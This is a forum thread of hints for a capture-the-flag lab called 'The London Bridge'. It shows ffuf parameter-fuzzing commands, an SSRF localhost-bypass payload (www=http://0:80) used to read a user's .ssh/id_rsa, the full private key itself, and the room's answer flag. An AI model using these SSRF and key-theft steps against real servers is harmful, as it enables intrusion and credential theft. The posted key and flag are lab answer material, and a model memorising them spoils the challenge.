Let’s talk about The London Bridge.
Any hints for foothold?
try fuzzing post parameters for the /view_image url. once you find out the parameter, you need to figure out how to use it to get a shell
Finally Got root! By unintended way
It’d be great if you share some hints from initial foothold to getting root.
Yeah , that was my 2nd acc
Foothold :
Try parameter fuzzing on /view_image file , not on the url but on the post data , like imageurl=test&FUZZ=test
If some wordlist don’t work try another , you will end up finding it , the parameter will lead you to ssrf , try port scanning in the server localhost, but localhost is being block , so find some local host bypass on payload all the things, and you will find the open port and do a dirbusting on the open port you will end up finding the id_rsa (use big.txt)
Root:
I got root using unintended path, this machine has a kernel exploit that you can find on GitHub, the pkexec one don’t work as it is not installed.
1 Like
What is the unintendend way?
I’m using this with several wordilst and nothing, maybe I’m losing something?
ffuf -u “http://10.10.115.233:8080/view_image” -w /usr/share/wordlists/params -d “imageurl=test&FUZZ=test” -X POST -fs 823
And how did you find that it was param fuzzing??
I’m fkt with this machine 
I used this command but no result.
ffuf -w httparchive_parameters_top_1m_2024_05_28.txt -u http://<MachineIP>:8080/view_image -X POST -d 'imageurl=test&FUZZ=http://<MY_IP>' -fs 823
I have seen with burp that imageurl is actually image_url but changing it on the ffuf command still not working. I have tried to fuzz that param too and nothing
Don’t frustrate yourself. A public write-up will be available very soon.
for anyone still stuck with the post parameter for /view_image, its www
2 Likes
this room is frustrating
How did u fuzz it? I’m sire www was on all of my wordlists
Create your payloads like this to send requests to localhost:
www=http://0:80
To get id_rsa:
www=http://0:80/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAz1yFrg9FAZAI4R37aQWn/ePTk/MKfz2KQ+OE45KErguL34Yj
5Kc1VJjDTTNRmc+vNRZieC8EwelWgpwcKACa70Ke2q/7zRLWHh23OUxWiSAAORTe
a1s5eus3ghTWjcfONROAkEg7O3XsNwgp93UUB8wbU+ADpZnFLPUDErFKoSp+dxG4
rxwqpAp6maqsE4dIZHdAq+Yt6/2HOERKrFWiONQpd6ZA8a325oWXY8UaREvKTuXc
jlL56t4iWQzsRQbBvB+ETg2ma01u/HmW3M9SyroPypcEOqvPnuPpqXHZu7BwALM5
NHhXCNmt+0EOBYKvejsDA6NeZfJgw65NVK+2hQIDAQABAoIBACJyZUaoBLegvMjg
2S32IZUcrr4qJrlCeOCUQDQp196tzlughf/rAwH9qpv9hXW+uYVhJZR/gxPPdm6W
Dlta1mIeuBLuHy9PDMDOAO0E0G9RIJha7iP5cJAJ2RvD6Gx/H7NTfQz64tQa39W4
hng0O9KbxoJleVWeONIiFZOaXiJthuro/d9GSivMBJyT8PR3JG6G+R4Qq1tAJqEU
Hx5DY/U7qVYQ1TE3EfbDR5y0+972fW7J0oZxOuwK6IWP9TtHcPPVIGweaIgZFys3
3ZFEzON5qRhNdV8lc127cUX5R5hFjn14GHJLpvbjkt8D9DggUKKNR8zPJfIGO5Tp
gdzclmECgYEA+kaVi0hq1sYSdZL4wHxDQJfGooPn8Hae8zFrsYjrVD8nOQ9NEz4N
XKqlGMhPc8P0PvuoKy1341ty966S8J+dKfdPzRURFzB84wy3A6CDnViRpCYwKFo0
Aa5wwpWZalBBpEis0h3YKCKVKyhs4/uN6lMw5H3GaCMdqqm00l9DRm0CgYEA1Bqq
e2pPYVCwyQb20/8aP305wu6Bdp+i3dUqkHndhPXmEL8EnXbEJuBymn7aKQ3Ln/zX
8G/7Mze845g93KAPFLeeNk/AmzXKnWB8mgcrFzxAD/wAxH1J9otLvhmX7BRVE6X/
0he6g1mdtNMXbt0B/aMOS+dCsMW1C/7oUfbxAXkCgYAlCvVvXBSUHVT2Gf6/XqUF
lnFL9IIL0ULNc+8go8dQ/NftVhpuUqzfnlI5TMyVsdcgy1akrWIlQI/PoQMWokk8
wOIK1Kdm60JQyLz9yHAyhb1osk5GarNv3EXMRyAh4CcXDbqmjsxDhHrXnHAhfkYO
/Kkr6IHJQAlQDTY6POdUMQKBgQCPPkMMfkuFyVzbJtzjZ1Futz+fKjw8xKrVbfUF
BYhZF0h83sRbI65tIv/C3xCu0SZHshaTxsy7VlU2z8ZXjbEhqLAstce6CqX/iv4b
d+PeGU6afPJ3wLWGz6Qjil1Tjpe2YVFXrbbEpm0fhcA5mwCRLuGk2VXs1Fjk9Q4o
7MDu4QKBgFIomwhD+jmr3Vc2HutYkl3zliSD239sH3k118sTHbedvKH5Q7nw0C+U
a7RMp/cXWZKdyRgFxQ7DQEorzWi5bLAyxXnMg0ghwWdf4nugQmaEG7t+OYUNsf7M
fDLzMA915WcODR6L0mWO0crAMbZQOkg1KlAiwQSQmuUpPqyAfq6x
-----END RSA PRIVATE KEY-----
username: beth
Hi, how did find beth user ? bruteforce ?
No, beth is found here.
www=http://0:80/.ssh/authorized_keys
1 Like
THM{l0n6_l1v3_7h3_qu33n}
Just submit the flag and move on. Don’t even think about to solve this challenge. THM challenges are nothing but a pointless puzzle that only wastes your time . Will share the root flag tomorrow